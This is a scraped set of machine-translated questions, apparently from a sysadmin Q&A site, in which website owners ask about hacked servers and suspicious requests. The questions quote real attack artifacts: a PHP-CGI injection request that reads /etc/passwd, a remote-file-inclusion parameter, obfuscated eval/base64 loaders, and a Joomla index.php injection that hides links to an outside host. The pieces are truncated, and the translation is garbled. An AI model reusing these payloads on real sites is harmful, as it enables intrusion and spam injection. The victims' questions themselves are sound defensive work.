我有一个在CentOS 6上托pipe的wordpress网站。看到下面的访问日志,我检查了服务器,看起来好。 任何人都可以解释这家伙试图做什么? 他们得到了他们想要的东西吗? 我禁用了allow_url_include,并将open_basedir限制为web dir和tmp(/ etc不在path中)。 190.26.208.130 – – [05/Sep/2012:21:24:42 -0700] "POST http://my_ip/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 32656 "-" "Mozilla/5.0"
最近我一直在发现很多奇怪的请求,比如我的Rails应用程序: Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET] Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}} ActionController::RoutingError (No route matches "/browse/brand/nike ///" with {:method=>:get}): 它看起来像自动化,因为我得到了他们很多,并注意到他们试图发送奇怪的参数: _SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt??? 这是恶意的,如果是的话,我应该怎么办?
我试图说明,将数据作为input并直接写入文件而不parsing,检查或消毒是一种安全风险。 任何人都可以展示一个如何被利用的例子。 我在想,可能有办法开始写一个新的文件,而不是它应该的。 如果这是可能的,我可能会写入一个名为ls或更less的文件等 对不起,我忘了提到操作系统。 这是Solaris。 这些文件只是稍后可能要读入数据库的数据文件,但我不想指望数据库是唯一的漏洞。 这台服务器上的程序正在侦听一个端口,我可以连接并发送数据,而且我知道它将把这些数据写入一个名为output.dat的文件中。
为了准备在渗透后迁移服务器,我们希望清理我们的数据并确保它不包含任何恶意攻击或安全漏洞。 为了让你明白我的意思,下面是我们要运行的testing列表(目前为止): 1)比较每个文件与恶意关键字(eval,base64,iframe,viagra等)的关键字列表2)扫描超过一个时间段的文件(以前是被黑文件的症状)3)查明任何名称过长的文件(另一个症状) 任何想法,我应该添加到这个列表?
在我的两个网站上发生类似的攻击(一个运行最新的Joomla,一个不运行)。 它通常说“被普通黑客攻击”或类似的东西。 当我检查其中一个文件时,有一个类似代码的PHP文件: eval("?>".gzuncompress(base64_decode("eJzUvWmT4kiyKPp9… etc. 我还发现了一个奇怪的HTM文件,有很多杂乱的代码。 如果你需要我可以发布这些文件压缩的地方。 攻击总是只是一个改变的索引页面和这个奇怪的PHP文件(但这次也有这个代码的另一个PHP页面: <?php if ($_GET['randomId'] != "Wo9QPY5euhw0bEKfNve82PW926VyluUh2HA3FGAidHDwA7h3wwZCOA2F2kva028q") { echo "Access Denied"; exit(); } // display the HTML code: echo stripslashes($_POST['wproPreviewHTML']); ?> 我已经恢复了原来的索引页面,但这真的很烦人。 我也检查我的电脑的木马,因为我读过,有人可能用特洛伊木马窃取我的FTP凭据(但这一个网站,我甚至没有使用FTP)。 帮帮我!
我的网站被取消了一天 – 从主机收到一条消息说,他们收到美国银行的投诉,我的网站被用于networking钓鱼客户。 我设法使我的网站在线,并发现了一些奇怪的代码片段和网站上的文件,我没有放在那里。 他们肯定是黑客,但现在我很害怕黑客如何进入我的网站,并把他的文件在那里。 我能做些什么来防止这样的事情再次发生!?!?!?
我的电脑正在向任意目的地发送ICMP数据包。 我不明白原因。 其中一个包的转储是: Internet Control Message Protocol Type: 3 (Destination unreachable) Code: 3 (Port unreachable) Checksum: 0x811b [correct] Internet Protocol, Src: 80.167.113.76 (80.167.113.76), Dst: 192.168.1.2 (192.168.1.2) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) …. ..0. = ECN-Capable Transport (ECT): […]
可能重复: 我的服务器被黑了应急 所有的Joomla! 在我的单个服务器上托pipe的站点被黑客攻击,并将以下代码注入到许多目录的index.php文件中。 <?php //{{126104ed GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; […]
如果我插入到没有DHCP的networking中,并且没有可访问的“样本”主机,我可以在configuration中查看。 我如何发现/猜测networkingIP范围,networking掩码? 网关IP地址? PS不build议暴力强化192.168。*。*与各种stream行的networking掩码:))
我们最近有一个网站被黑了,其中一些PHP代码被注入到index.php文件中,看起来像这样: eval(gzinflate(base64_decode('s127ezsS / … bA236UA1'))); 该代码导致另一个php文件(cnfg.php)被包括在内,导致一些与制药有关的垃圾邮件被显示(但只能被googlebot等人看到)。 这看起来像WordPress的药品黑客,除非我们没有运行该软件。 代码已经被删除,但是我希望能够防止这种情况在将来发生。 我意识到这是一个相当广泛的问题,可能会有无数的安全漏洞可能是负责任的,但是我认为我会把它放在那里,以防过去有人遇到过这样的问题。 什么是一些潜在的安全漏洞,将允许这些PHPfile upload? 我能做些什么来防止这种情况发生? 干杯